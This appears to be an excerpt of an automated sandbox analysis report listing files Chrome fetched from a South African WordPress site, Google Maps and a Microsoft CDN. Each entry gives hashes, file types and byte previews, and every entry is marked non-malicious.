                                                                                                                      File Type:ASCII text, with very long lines (854)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):230744
                                                                                                                      Entropy (8bit):5.575856168375489
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:20jvaMkmt5/2W+1NHZkHzx5NWzgLUP4nOEN6h1qbyc3sAwpFt/no7envRnOKN08s:20jvaMkmt5/2W+PZkHzx5kzgLUP4nOE3
                                                                                                                      MD5:4A5FCAE2A48B5CA79FDB9ACCB6077458
                                                                                                                      SHA1:BF81CA63E33F11C153E675FD48C5906A4225C5E2
                                                                                                                      SHA-256:191A1458C389F54D3036CD028F10A0721297E755CEED1545BC775BE2CF402F37
                                                                                                                      SHA-512:5EE78E157EDF24549061DBEF002AEEAA228776DED5C32C87D2692928A113E0F773F4DFA5C6EC0F94E0C9FD4B4BEF929C08A05DE87CAC10FE80E5D767CC28D06E
                                                                                                                      Malicious:false
                                                                                                                      Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,ma,pa,oa,ta,caa,daa,Na,Ab,Eb,eaa,xc,yc,faa,Hc,Ic,Nc,od,kaa,Od,Fd,Gd,Kd,ce,maa,naa,$d,laa,oaa,le,paa,oe,ne,pe,qaa,xe,taa,ef,waa,zaa,ff,yaa,xaa,vaa,uaa,gf,Aaa,vf,Baa,Gf,Lf,Eaa,$f,ag,bg,cg,Gaa,Haa,Laa,Iaa,Kaa,fg,ng,Maa,Naa,pg,Paa,Oaa,Qaa,rg,Saa,Taa,Uaa,Vaa,Waa,Yaa,$aa,cba,vg,zg,Ag,aba,bba,fba,Bg,Fg,Gg,gba,Ig,Hg,hba,jba,lba,pba,rba,qba,tba,sba,yba,zba,Dba,Eba,Zi,Gba,Hba,Iba,Lba,Kba,Mba,Nba,hj,Jba,Oba,Ej,Kj,Uba,ak,Wba,ck,Yba,lk,aca,dca,vk,Jk,Lk,Ik,Mk,$k,nl,lca,ql,tl,ul,wl,zl,qca,Cl,sca,vca,xca,.wca,Il,zca,Ll,Nl,Ol,Aca,Ul,Fca,Yl,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:GIF image data, version 89a, 352 x 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):3620
                                                                                                                      Entropy (8bit):6.867828878374734
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                                      MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                                      SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                                      SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                                      SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                                      Malicious:false
                                                                                                                      URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif
                                                                                                                      Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (4800), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4800
                                                                                                                      Entropy (8bit):5.029898034378478
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:w2mhbKJNtqH9Q0db5JDA4L+ZAh2HVB3gDoboW3x9ofoB7VGmtxmAlYqwM8E:w2m6i9B7DGz3R3xPsmfKblE
                                                                                                                      MD5:7CB2D24BAC43A6950AB562ECC5FFFF2A
                                                                                                                      SHA1:5D4C95EB3DD53C0F28F7F1325A9BFADE16D34048
                                                                                                                      SHA-256:0F7D7EAD244D87E6128E8943A65F60EAE5D56601703F3D1B90F2CB9B72D5F6FD
                                                                                                                      SHA-512:5707E9354BD12E9F8A90A49E1263CB8750C57D8EA04AE1C045952243AD0BE27D42011860B4B1DE02DD6C9F67C9257E949E3A707D31A93B51385802B01513049D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/build/elements/element-clients.css?ver=15.0.6
                                                                                                                      Preview:.clients.two-cols>div{width:49.4%}.clients.two-cols.no-carousel>div{width:48.4%}.clients.two-cols>div:nth-child(2n+2){margin-right:0}.clients.carousel.two-cols>div{margin:0 10px}.clients.three-cols>div{width:32.6%}.clients.three-cols.no-carousel>div{width:31.6%}.clients.three-cols>div:nth-child(3n+3){margin-right:0}.clients.carousel.three-cols>div{margin:0 10px}@media only screen and (min-width:1000px){.clients.no-carousel.three-cols>div:nth-child(3n+4){clear:both}}@media only screen and (min-width:690px){.clients.no-carousel.four-cols>div:nth-child(4n+5){clear:both}.clients.no-carousel.five-cols>div:nth-child(5n+6){clear:both}.clients.no-carousel.six-cols>div:nth-child(6n+7){clear:both}}.clients.four-cols>div{width:24.2%}.clients.four-cols.no-carousel>div{width:23.2%}.clients.four-cols>div:nth-child(4n+4){margin-right:0}.clients.carousel.four-cols>div{margin:0 10px}.clients.five-cols>div{width:19.2%}.clients.five-cols.no-carousel>div{width:18.2%}.clients.five-cols>div:nth-child(5n+5){
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):8198
                                                                                                                      Entropy (8bit):7.545002380293291
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bToo2XKLGpWb5cMIJtM/rl6mOCZB0jq7/XyHafHfEC/9JQlB8sb9nA6SR1ISQp:b0vFWtctcJqq2q7feafLzeBbAx1gp
                                                                                                                      MD5:5162BB80799DED633538BE2BCDB6A96D
                                                                                                                      SHA1:F3D512E7831EF6F16CD5A9A5A53C8D58D36DB2F4
                                                                                                                      SHA-256:B574699E5AEA93AA323F5629570CBB3079CC3025E9E2E1C1BE9779CBEAEEFC3D
                                                                                                                      SHA-512:77F5B2AECFADE2E27A80D8DDB7AA53C648B09A0997A5F9F3C3D862C85FA7489AC01471B508AEEFEFED76E4D9AE3B1E8DFC91A89E51CCF01FD4CDFACEC33D44E6
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d........................... .............................................................................................................................................J.J.......................................................................................... P1..0@.!2.4#$.5."3......................!.1AQ"..aq...2.0..BRr#3 P.....b.@..C..................P...`.!1 .aA....................!1.AQa Pq..0....@................................................................................................................................................................................................................................................................................F..1...S.{..d....@....................#..UZ.m.....>..N.{.....L...b@..7.....d.Y........M......W.k.[.^..z[3K...*k,9k.-uS..9.5.l."@.......d....7..h} ...O.k.~.C..<{..FMl....-Mf...0...%..M'K[V...V...v....+nw.qp..{?7..........U../.G..c..=Me.,>.eEQW.....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10449
                                                                                                                      Entropy (8bit):7.686800855393292
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:PsQRL02n0wL2qyg4Kwto+7njZ5MnzVEC4otRjw9wadu30RBzQ2:PsQRL020wLVEt5bjLMnzVuotRjw1FBzD
                                                                                                                      MD5:6C90379E2C033F648AB643EAF9210A78
                                                                                                                      SHA1:4D4A240A099738D9C6F73AB3D6A2FFB6B41CC9B1
                                                                                                                      SHA-256:8598BA960522F3F7E559ECBB3394B9BAE27AFA3D887C7B52B5CAE74F98825E66
                                                                                                                      SHA-512:6AE36731B0F12AC36EFBA5EEA474ED00D857DAB199AE54C4A52CA13C91B7D2BCC77B5ECA8A43A9B592BE15DC56A7626C40416849696EEA0AD3AC36993DB95A1A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/site.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................[...9......(.............................................................................................................................................J.J.........................................................................................@1...P!. .35"2.`.......................!1...Aq".@Qa.2BR#3...r.P..b....C.`..S$..................P!.... `..1Q.a....................!.1AQaq@..P... `...........................................................................................................................................................=...............!..3......d"M.7................T.q..jv...Y....t..6'...............-.......u>7#Pf./>..fA=...p...@..........*6........miw.j.y..1T.9y..................]jWL:.\.....w...t.Q.......h.~...@..........n.x.q.....N.u.q..Y.W..>.W.<.....:..............j.w.].oV.m.jMFdt.5:.~.{.R.D..Cmt.............'......7..E:.jE....+1.i.}._...............&).B?.w....6.....yz+o8ah>m.
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 134 x 121, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):2700
                                                                                                                      Entropy (8bit):7.869079537914825
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:m+UyH0dbfguNC2VN/cdRqdMHo5vjHp24flJ2N25cQ5RY6Qk1jaT91Zr9:m+Glj/cdRqdNjJ3lJ/f5RY+QZr9
                                                                                                                      MD5:D7FF3B49A5E38911C7D827AC81A63F81
                                                                                                                      SHA1:0F0A9A8C868A4865C20394707412A0914D5E184C
                                                                                                                      SHA-256:BBB6A77E775D4AE2153934817ADE9E056A2BF18B606120056F25AB892FB07D15
                                                                                                                      SHA-512:FE688B0CE5FE0B6356F51020D490A83CFB95AC7BE54E3D2A7C4D1AEC1ED6021AA6EE933F128A7C09037F9969DB2E6C4A049BAC74C01D92F1C2C80CBBFD34590E
                                                                                                                      Malicious:false
                                                                                                                      Preview:.PNG........IHDR.......y.......Y]....tEXtSoftware.Adobe ImageReadyq.e<....IDATx...o.E...W..Ei.....EST8.T..#........._@......%....*.4...1..B..9.!..A..........u.....;;3....&k%....~..;.S.NN...........N.b.M.....S..gU....0.5.....DD!H{'.).lKK.k..y...0y... .[..$.. ...`.e....f...."i.Q...@. IX.......0...e[....C...A...U..1..]....C>....m..I..D..D[..~.........E......`.`....kl..V^.P[.P.>...`.B]..s.VSK.A@`....M(..x7.....(.....qPj.T~s./;...C..s.u:.9@.;..-/g5.s...$./..U-..r.{......~P...$......CP../.".M0..7..m._y.y..`....d.jYN...).......O..&.{Y^Q.C..J6.,].$|hi.LL..Ptk.K|....Y........K. .e.{A.XG.w$"...s.....jLZ_[...jQ@..HD...!.}.p..)>.......p...&".E..Tu..U....[....W~..d....J..7../Z.J"RP..v7M./[?.....(Q.EF;.?.`..(..........{?.1h!..y.u.1.<.5X.S'.......}`.9.....'.5.d.]..q.....q..1..'r.oN..B.qJ..8...[....%M...)=..yG08.=.6..>...d@mw.q8.T.r2...d ....[...f....U.A.X...._..!..-.....$..]N[+. p..)..9....~t.G........xy..`.....Z..7.T..`8...:Mq.N....3.J.?.o...3!..-.d...x....W.BJ.-
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6730
                                                                                                                      Entropy (8bit):7.404181296915908
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:G/wFLp9KY8V0REZhp3Qh/mpMkc8IVE+3K/lt/XLffJCzYDfboCiLW+/ePsl:Gw1PKY8Vt8MMkctExDlDzyNGUl
                                                                                                                      MD5:D368BB45BB15EE6D3DC28A21B81131AE
                                                                                                                      SHA1:33CAF014F939FFB0E792188F68D9B89DD3B30146
                                                                                                                      SHA-256:0BE69D1BF505AAFAEF113047457705E10FE10CC387E5A7286EB401D5F68091F0
                                                                                                                      SHA-512:859B573FCCA1603D25A03D3EDBB8C6B6CD0F08331E7ADC2826DEF7EE842EDB10169691122941972B7C8FBD5074124DC347D27CAED460EEF90DE97B9C5A713A46
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/uploads/2018/03/mmi-holdings.jpg
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d............................H............................................................................................................................................J.J........................................................................................P.@!1.#."2.45. .........................!1AQaqR.@P...."2B.# ..3.....b.s.r.t......................................!1Q.Aaq.P.@... ...`...............@.......................................................................................................................................................................................i..z.%k.Jv..............r...XZS.y..z...............\..h...%.../c$.........h...4K..`.T....hk.0%.Z..d.........E.Q.VMP.. jFeE5.......&.].fk.........k+.GQ..3".N##.:J...7htY..Z............G..D.&yI..'O...y.\.GO~.mU.LM.>......... .s".H.zq..S".v...?....It..............p..sqU!.3...r*}.y..u....;R\..........|<..u..D........................(.D.r...U..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (554)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):195339
                                                                                                                      Entropy (8bit):5.631215123326387
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:g3AZzctEut7oE5UetupKwtZx2hCrLKZoqGZhaV2lQD7hqAYZN8HK1hg1Md01m6jf:gQZzcmutf5UetsKwzx2hCreZoqGZhaai
                                                                                                                      MD5:CE4DFF39124FC25BB414CB5D839233DF
                                                                                                                      SHA1:08343FA62873457B13BB894227E3DAFBBDE17716
                                                                                                                      SHA-256:7B367E5B3A94A7704B66F17ADC9D8F44D1F19AF96E59E8E528745B9DADC303D1
                                                                                                                      SHA-512:7AC2A1AAC2ED73C50E7B25A0F65AF83636CB3CC7047D57A190AF84E221359B443AF6691C060EC3BD3AA1253D2B5D644484BE496DC773253937051E41F6965139
                                                                                                                      Malicious:false
                                                                                                                      Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var jxa,kxa,mxa,oxa,HB,pxa,qxa,sxa,JB,LB,txa,MB,NB,uxa,QB,wxa,UB,WB,XB,YB,ZB,$B,bC,cC,xxa,dC,yxa,gC,iC,jC,kC,Axa,Bxa,lC,Cxa,oC,rC,sC,Dxa,vC,Gxa,wC,yC,zC,Ixa,Jxa,Kxa,Mxa,FC,Oxa,GC,Qxa,HC,Sxa,Rxa,Txa,Uxa,Vxa,Wxa,Xxa,Yxa,Zxa,$xa,aya,bya,cya,dya,eya,fya,gya,hya,iya,jya,kya,LC,nya,NC,oya,pya,qya,rya,sya,tya,uya,vya,wya,xya,yya,Aya,Cya,Eya,Gya,Iya,Kya,Mya,Oya,Qya,Sya,Tya,Uya,Vya,Wya,Xya,Yya,Zya,OC,$ya,aza,bza,cza,dza,eza,gza,QC,RC,hza,iza,jza,kza,lza,mza,nza,oza,pza,qza,rza,SC,sza,TC,tza,uza,vza,wza,xza,.yza,zza,UC,Aza,VC,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,Lza,Mza,Nza,Oza,Pza,Qza,Rza,Sza,Tza,Vza,Wza,Xza,Zza,XC,$za,aAa,bAa,cAa,dAa,eAa,iAa,jAa,lAa,oAa,pAa,qAa,hD,rAa,iD,sAa,jD,tAa,uAa,uD,vD,wAa,xD,yD,zD,yAa,zAa,AAa,CD,DD,FD,GD,BAa,HD,JD,CAa,EAa,FAa,HAa,LAa,MAa,PD,QAa,UAa,VAa,WAa,SD,XAa,ZAa,$Aa,aBa,bBa,VD,dBa,iBa,cE,lBa,kBa,dE,mBa,fE,oBa,pBa,qBa,sBa,uBa,EE,vBa,FE,wBa,xBa,yBa,zBa,HE,B
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):6817
                                                                                                                      Entropy (8bit):7.3656419804802225
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:0aqjDmx+CVEeP1Le1bGT4bN+o+jPduwZkQ:0aCodaetiATK9gPcokQ
                                                                                                                      MD5:CF5B13294D302AE96469F818D5D7E042
                                                                                                                      SHA1:83FC84BA938CFE7890DDB1F41AD6356BA61BE38D
                                                                                                                      SHA-256:F07827E86BC790307A99C9CEBC9A1B85276F55C921F7E7F51171E9E1DB2D6751
                                                                                                                      SHA-512:EE3E8DF46CD7188D2DE186809B65F0A7F8CA3D8E4E3C67221F95A2438709DB0C8CE328EFD5F51C9B1CCC383980310028C45CACC192FC9C1DE0C5C99A313CF48C
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d................h........................................................................................................................................................J.J........................................................................................1.4@..... .!2350$P"#......................!1..Aq...2.Q."r30.a..B.s4 .Rb..CP..#.$.................P!.... a....................!1Q.Aaq.....0@.. ..P...............................................................................................................................................................................................................................................................................................|..z............_.:E.cw...I>].yG.....K't.......5..k`....P.5O.O...._7I..e>..8..U.nu.;Z.TU.b.9;....=....G.....?..E.i......7.s6'.@.&`xPK...q2h..0!.......Z.:.N..._....d..<.s.,{<.L.i._s..2^8.....f.......f%....qi.......Z.:.N....?...N].:...A....f..v
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7281)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):7416
                                                                                                                      Entropy (8bit):5.331948687854139
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:PEcg7lrL7LMgkubetbEL/Q0O3fWt2GANOr+FDVq26A00NmSvzuzGyXPn1BBLt8:Pi7lrPVSbV5y+FUVb4
                                                                                                                      MD5:8E9392EC75B6EF18BA671A0A4432D1B1
                                                                                                                      SHA1:7E7A63444FB918382D51BD2F7BD3757C0434FF10
                                                                                                                      SHA-256:FDCB39EEC676F0D52A9647156D6E1C5E0668EBDBB1060CB8FF89D5B4AB4695E8
                                                                                                                      SHA-512:5E3B713B57787FF0093A86B7B91180C7EB878CD652080258FD094CE4F978881795126671EE9AB0BC782310D8AA2FF83AF6733CB0E4FA6A0A57FE611062275890
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/js/build/third-party/transit.min.js?ver=0.9.9
                                                                                                                      Preview:/*!.* jQuery Transit - CSS3 transitions and transformations.* (c) 2011-2012 Rico Sta. Cruz <rico@ricostacruz.com>.* MIT Licensed..*/..(function(k){k.transit={version:"0.9.9",propertyMap:{marginLeft:"margin",marginRight:"margin",marginBottom:"margin",marginTop:"margin",paddingLeft:"padding",paddingRight:"padding",paddingBottom:"padding",paddingTop:"padding"},enabled:true,useTransitionEnd:false};var d=document.createElement("div");var q={};function b(v){if(v in d.style){return v}var u=["Moz","Webkit","O","ms"];var r=v.charAt(0).toUpperCase()+v.substr(1);if(v in d.style){return v}for(var t=0;t<u.length;++t){var s=u[t]+r;if(s in d.style){return s}}}function e(){d.style[q.transform]="";d.style[q.transform]="rotateY(90deg)";return d.style[q.transform]!==""}var a=navigator.userAgent.toLowerCase().indexOf("chrome")>-1;q.transition=b("transition");q.transitionDelay=b("transitionDelay");q.transform=b("transform");q.transformOrigin=b("transformOrigin");q.transform3d=e();var i={transition:"transit
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (854)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):230744
                                                                                                                      Entropy (8bit):5.575856168375489
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:6144:20jvaMkmt5/2W+1NHZkHzx5NWzgLUP4nOEN6h1qbyc3sAwpFt/no7envRnOKN08s:20jvaMkmt5/2W+PZkHzx5kzgLUP4nOE3
                                                                                                                      MD5:4A5FCAE2A48B5CA79FDB9ACCB6077458
                                                                                                                      SHA1:BF81CA63E33F11C153E675FD48C5906A4225C5E2
                                                                                                                      SHA-256:191A1458C389F54D3036CD028F10A0721297E755CEED1545BC775BE2CF402F37
                                                                                                                      SHA-512:5EE78E157EDF24549061DBEF002AEEAA228776DED5C32C87D2692928A113E0F773F4DFA5C6EC0F94E0C9FD4B4BEF929C08A05DE87CAC10FE80E5D767CC28D06E
                                                                                                                      Malicious:false
                                                                                                                      URL:https://maps.googleapis.com/maps-api-v3/api/js/59/1/main.js
                                                                                                                      Preview:(function(_){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2019 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*.. Copyright 2017 Google LLC. SPDX-License-Identifier: BSD-3-Clause.*/./*..Math.uuid.js (v1.4).http://www.broofa.com.mailto:robert@broofa.com.Copyright (c) 2010 Robert Kieffer.Dual licensed under the MIT and GPL licenses..*/.var aaa,ma,pa,oa,ta,caa,daa,Na,Ab,Eb,eaa,xc,yc,faa,Hc,Ic,Nc,od,kaa,Od,Fd,Gd,Kd,ce,maa,naa,$d,laa,oaa,le,paa,oe,ne,pe,qaa,xe,taa,ef,waa,zaa,ff,yaa,xaa,vaa,uaa,gf,Aaa,vf,Baa,Gf,Lf,Eaa,$f,ag,bg,cg,Gaa,Haa,Laa,Iaa,Kaa,fg,ng,Maa,Naa,pg,Paa,Oaa,Qaa,rg,Saa,Taa,Uaa,Vaa,Waa,Yaa,$aa,cba,vg,zg,Ag,aba,bba,fba,Bg,Fg,Gg,gba,Ig,Hg,hba,jba,lba,pba,rba,qba,tba,sba,yba,zba,Dba,Eba,Zi,Gba,Hba,Iba,Lba,Kba,Mba,Nba,hj,Jba,Oba,Ej,Kj,Uba,ak,Wba,ck,Yba,lk,aca,dca,vk,Jk,Lk,Ik,Mk,$k,nl,lca,ql,tl,ul,wl,zl,qca,Cl,sca,vca,xca,.wca,Il,zca,Ll,Nl,Ol,Aca,Ul,Fca,Yl,
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Web Open Font Format, TrueType, length 21132, version 1.0
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):21132
                                                                                                                      Entropy (8bit):6.474880714621367
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:UCsn/05DNN6jdhvdMChAtJ06rdexsBcX9XkpC7A0nAqv37d5:Hsn/2NN6jXmChJ6QxwpC7vAs3v
                                                                                                                      MD5:A6E8AC33C6EF9D3273F1A2E7742575D8
                                                                                                                      SHA1:F658531381D0A1499015BF91EBC78065A70E14F2
                                                                                                                      SHA-256:76AD1AA3269754174EC80A4A0C9874814DA636CF00D5E38EA8FEF6B983AB84D5
                                                                                                                      SHA-512:1143A581EF8BF40CDB24037747C59D3F59CABFE6265025F9AABE297E80923BC739438C5E103E65EE923201AF88B4897D5913FD8FD5BB30A9C14D63F47AFD952A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/themes/salient/css/fonts/icomoon.woff?v=1.3
                                                                                                                      Preview:wOFF......R.......R@........................OS/2.......`...`....cmap...h...D...D_.zQgasp................glyf......K...K.I..5head..NH...6...6!...hhea..N....$...$...dhmtx..N....h...hR..Bloca..P............Nmaxp..P.... ... ...Xname..P..........J..post..Rl... ... ...............................3...................................@........@...@............... .................................(...F.@....... .0.........$.4.6.R.V.g.t.v............... ...........>.V.X............ .0.........#.4.6.P.T.g.t.v............... ...........>.U.X............. . . . ..........................$......./...<.M.G.......F..................................................................................................79..................79..................79..................79...........+.......7....'...+......+....+......+.....................7'.....+......+./.+......+./..............&.C..%'>.54'..'&#"............32670.1..6?.64.47>.7632............#"'..'&5..... nJJTTJJn nJJT9i-....d..q..S88?@78T....
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):17949
                                                                                                                      Entropy (8bit):7.871055604476079
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:YQG7w9nyr1+/sIKMl76n+KmBbMj+U1plFKRrJW4b6xu1gznkx3:YQG6yZGYMl+F4DWBst6ygzkx3
                                                                                                                      MD5:147F1ECCFA54C25917A02E6290B0AB86
                                                                                                                      SHA1:A438158B36C23748E1C449449AFB3AC41C474ABF
                                                                                                                      SHA-256:DE636A8C0B771C42668904627B1E37617F98573962E7102A068FBE3E0028B1F0
                                                                                                                      SHA-512:3FE47F0550FD7232300139092CC2E5F02A09D61CAFDF5D5FA89E5DDF6A8BB709C7FCC8BB5839CEB45ADF98EF333493B55E6B40BE621E74CE131D77BA13650A18
                                                                                                                      Malicious:false
                                                                                                                      Preview:......JFIF.....d.d......Ducky.......<.....&Adobe.d....................z..0...F.............................................................................................................................................J.J........................................................................................!...@1 0..P."2#$A`B%534.......................!.1A...Qaq."2.4...BRr#3.@...s0b...P.5...S$C....................!. @P10Qap..`.A"q......................!1A.Qaq.....@...0P. ................@....................................................................................................................................$......f^.l..v.j..H............?a../.N~..1..u..mq'...u.B............%_....V.....{..Y..Y.....z''.a^............ipi...Z...T.......m..n.V......v....A.6..............9V^...vj..I.&..}..o...>^....>..[..6.:..........y..Q...S.....<t.lzY.....J...<..8..b....0.........^..j.{...z:.......h.K9....q}.oC.........'.s..Q.............a..u6...a......:.;.9.8.Y..t..t..
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (745)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26583
                                                                                                                      Entropy (8bit):4.801142969566439
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:WKiitGHBpfOiaCKaUGia7tyIADu8vVeTUVEMm7BGBS:TtEJz5Zy/Du8vY3
                                                                                                                      MD5:7493AC7B2815C1B0DB6EC26A2080B625
                                                                                                                      SHA1:35B090889DB267C357C08A2BD28F4A9FC199D796
                                                                                                                      SHA-256:AF6AAD45DFEA3DAD21AE2D7D9B2B44E7EE84EC9B9DF016489EC4F003EDF1314F
                                                                                                                      SHA-512:0EAC8F30EAFDF236CA0D8E96599CE6DAE7A99EB4E48AEAFBCB2E9DD0A239AA8AAC7145FFCF32719E90E0D505C5BCCC89F4EB6B367AF49DB3ADFBCA0C9983A9A3
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.itnaledi.co.za/wp-content/plugins/js_composer_salient/assets/js/dist/js_composer_front.min.js?ver=6.9.1
                                                                                                                      Preview:/*!. * WPBakery Page Builder v6.0.0 (https://wpbakery.com). * Copyright 2011-2021 Michael M, WPBakery. * License: Commercial. More details: http://go.wpbakery.com/licensing. */..// jscs:disable.// jshint ignore: start..(function($) {. "function" != typeof window.vc_js && (window.vc_js = function() {. /* nectar addition */. vc_rowBehaviour();. }), "function" != typeof window.vc_plugin_flexslider && (window.vc_plugin_flexslider = function($parent) {. ($parent ? $parent.find(".wpb_flexslider") : jQuery(".wpb_flexslider")).each(function() {. var this_element = jQuery(this),. sliderTimeout = 1e3 * parseInt(this_element.attr("data-interval"), 10),. sliderFx = this_element.attr("data-flex_fx"),. slideshow = 0 == sliderTimeout ? !1 : !0;. this_element.is(":visible") && this_element.flexslider({. animation: sliderFx,. slideshow: slideshow,. slideshowSpeed: s
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, progressive, precision 8, 330x330, components 3
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):9285
                                                                                                                      Entropy (8bit):7.634431161290036
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:rPovdPvnrId4RscxbWIion5DWAKBackRi:r2hUcsPHon5ia/Ri
                                                                                                                      MD5:E1A25FC97A86E87C2907D1D30C404C0C
                                                                                                                      SHA1:10B753B70DDC5DEB33D4F0D0D1879F2FB37DF95B
                                                                                                                      SHA-256:B5369B01587A49C672A4B377954FC5FB4A35A5511243A63F858C1BEA4ADA76A2
